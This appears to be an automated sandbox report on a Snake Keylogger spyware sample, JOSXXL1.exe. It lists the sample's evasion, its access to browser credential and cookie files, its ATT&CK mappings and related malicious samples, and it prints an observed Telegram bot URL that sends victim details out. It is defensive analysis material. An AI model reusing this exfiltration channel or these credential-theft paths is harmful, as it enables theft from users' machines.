            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -596078s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -595969s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -595824s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -595477s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -595355s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -595247s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -595117s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -595000s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -594891s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -594766s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -594657s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -594532s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -594407s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -594297s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -594188s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -594063s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -593938s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -593813s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -593688s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -593578s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -593469s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -593344s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405974
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Code function: 0_2_004064C6 FindFirstFileW,FindClose,0_2_004064C6
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Code function: 4_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405974
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Code function: 4_2_004064C6 FindFirstFileW,FindClose,4_2_004064C6
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Code function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Microsoft
            Source: JOSXXL1.exe, 00000004.00000002.2943116609.000000000701D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
            Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWxA
            Source: C:\Users\user\Desktop\JOSXXL1.exe; API call chain: ExitProcess graph end node graph_0-4636
            Source: C:\Users\user\Desktop\JOSXXL1.exe; API call chain: ExitProcess graph end node graph_0-4639
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Process token adjusted: Debug
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Queries volume information: C:\Users\user\Desktop\JOSXXL1.exe VolumeInformation
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Code function: 0_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A5
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Users\user\Desktop\JOSXXL1.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara match; File source: 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match, File source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 31 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Access Token Manipulation | NTDS | 1 System Network Configuration Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 215 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| JOSXXL1.exe | 58% | ReversingLabs | Win32.Spyware.Snakekeylogger |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll | 0% | ReversingLabs | |
            No Antivirus matches
            No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
| https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
| https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe |
| http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
| https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe |
| https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
| https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
| http://checkip.dyndns.org/ | 0% | URL Reputation | safe |
| https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | 0% | URL Reputation | safe |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
| https://reallyfreegeoip.org | 0% | URL Reputation | safe |
| https://apis.google.com | 0% | URL Reputation | safe |
| https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | 0% | URL Reputation | safe |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
| https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| drive.google.com | 142.250.185.238 | true | false | | unknown |
| drive.usercontent.google.com | 142.250.181.225 | true | false | | unknown |
| reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown |
| api.telegram.org | 149.154.167.220 | true | true | | unknown |
| checkip.dyndns.com | 193.122.130.0 | true | false | | unknown |
| checkip.dyndns.org | unknown | unknown | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown |
| https://reallyfreegeoip.org/xml/173.254.250.68 | false | | unknown |
| http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true |
| 142.250.181.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
| 188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true |
| 193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false |
| 142.250.185.238 | drive.google.com | United States | 15169 | GOOGLEUS | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1542950
Start date and time: 2024-10-26 23:55:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: JOSXXL1.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/7@6/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 187
• Number of non-executed functions: 130
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: JOSXXL1.exe
| Time | Type | Description |
|---|---|---|
| 17:57:19 | API Interceptor | 8330x Sleep call for process: JOSXXL1.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 149.154.167.220 | SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exe | malicious | AgentTesla | |
| 149.154.167.220 | Certificado FNMT-RCM.exe | malicious | GuLoader, Snake Keylogger | |
| 149.154.167.220 | Justificante.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | |
| 149.154.167.220 | n#U00ba 7064-2024.exe | malicious | GuLoader, Snake Keylogger | |
| 149.154.167.220 | SOLICITUD URGENTE RFQ-05567.exe | malicious | Snake Keylogger, VIP Keylogger | |
| 149.154.167.220 | https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVz | malicious | Unknown | |
| 149.154.167.220 | PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs | malicious | GuLoader, Snake Keylogger, VIP Keylogger | |
| 149.154.167.220 | Factura n#U00baB-2542.exe | malicious | GuLoader, Snake Keylogger | |
| 149.154.167.220 | Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | malicious | Snake Keylogger, VIP Keylogger | |
| 149.154.167.220 | Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe | malicious | Snake Keylogger, VIP Keylogger | |
| 188.114.96.3 | DBUfLVzZhf.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1 |
| 188.114.96.3 | R5AREmpD4S.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1 |
| 188.114.96.3 | 7950COPY.exe | malicious | FormBook | www.globaltrend.xyz/b2h2/ |
| 188.114.96.3 | transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | paste.ee/d/Gitmx |
| 188.114.96.3 | 19387759999PO-RFQ-INVOICE-doc.exe | malicious | FormBook | www.zonguldakescortg.xyz/483l/ |
| 188.114.96.3 | PO 4800040256.exe | malicious | FormBook | www.rtpngk.xyz/876i/ |
| 188.114.96.3 | yGktPvplJn.exe | malicious | Pushdo | www.fnsds.org/ |
| 188.114.96.3 | rPedidodecompra__PO20441__ARIMComponentes.exe | malicious | Lokibot, PureLog Stealer, zgRAT | dddotx.shop/Mine/PWS/fre.php |
| 188.114.96.3 | Orden de Compra No. 78986756565344657.xlam.xlsx | malicious | AgentTesla | paste.ee/d/nwtkd |
| 188.114.96.3 | Doc 784-01965670.exe | malicious | FormBook | www.launchdreamidea.xyz/bd77/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| reallyfreegeoip.org | dekont_001.pdf.exe | malicious | Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | Bank transfer receipt 241015.exe | malicious | Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | Certificado FNMT-RCM.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | Justificante.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | n#U00ba 7064-2024.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | Factura 1-014685.pdf.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | SOLICITUD URGENTE RFQ-05567.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | Factura n#U00baB-2542.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3 |
| checkip.dyndns.com | dekont_001.pdf.exe | malicious | Snake Keylogger | 158.101.44.242 |
| checkip.dyndns.com | Bank transfer receipt 241015.exe | malicious | Snake Keylogger | 132.226.8.169 |
| checkip.dyndns.com | Certificado FNMT-RCM.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169 |
| checkip.dyndns.com | Justificante.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.8.169 |
                                                                                  n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  Factura 1-014685.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  SOLICITUD URGENTE RFQ-05567.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  Factura n#U00baB-2542.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  api.telegram.orgSecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  SOLICITUD URGENTE RFQ-05567.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVzGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Factura n#U00baB-2542.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                  TELEGRAMRUSecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  SOLICITUD URGENTE RFQ-05567.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVzGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Factura n#U00baB-2542.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  CLOUDFLARENETUSWINNING DILIGENCE - VESSEL PARTICULARS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 104.26.13.205
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 104.21.9.210
                                                                                  R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 104.21.9.210
                                                                                  DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 104.21.9.210
                                                                                  MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 172.67.161.82
                                                                                  73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 172.67.161.82
                                                                                  SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 188.114.97.3
                                                                                  DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 188.114.96.3
                                                                                  R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 188.114.96.3
                                                                                  ORACLE-BMC-31898USdekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  (No subject) (92).emlGet hashmaliciousUnknownBrowse
                                                                                  • 192.29.14.118
                                                                                  Factura 1-014685.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 134.70.38.61
                                                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 129.147.169.37
                                                                                  yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                  • 147.154.3.56
                                                                                  la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                  • 130.61.69.123
                                                                                  New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                                                                  • 158.101.44.242
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                  54328bd36c14bd82ddaa0c04b25ed9ad8m9f0jVE2G.exeGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  8m9f0jVE2G.exeGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  cabbage.exeGet hashmaliciousAtlantida StealerBrowse
                                                                                  • 188.114.96.3
                                                                                  Bank transfer receipt 241015.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eWINNING DILIGENCE - VESSEL PARTICULARS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 149.154.167.220
                                                                                  MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 149.154.167.220
                                                                                  73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 149.154.167.220
                                                                                  MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 149.154.167.220
                                                                                  73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 149.154.167.220
                                                                                  6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  gI1wz7QtZV.lnkGet hashmaliciousLonePageBrowse
                                                                                  • 149.154.167.220
                                                                                  Hxn7F5YIYJ.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
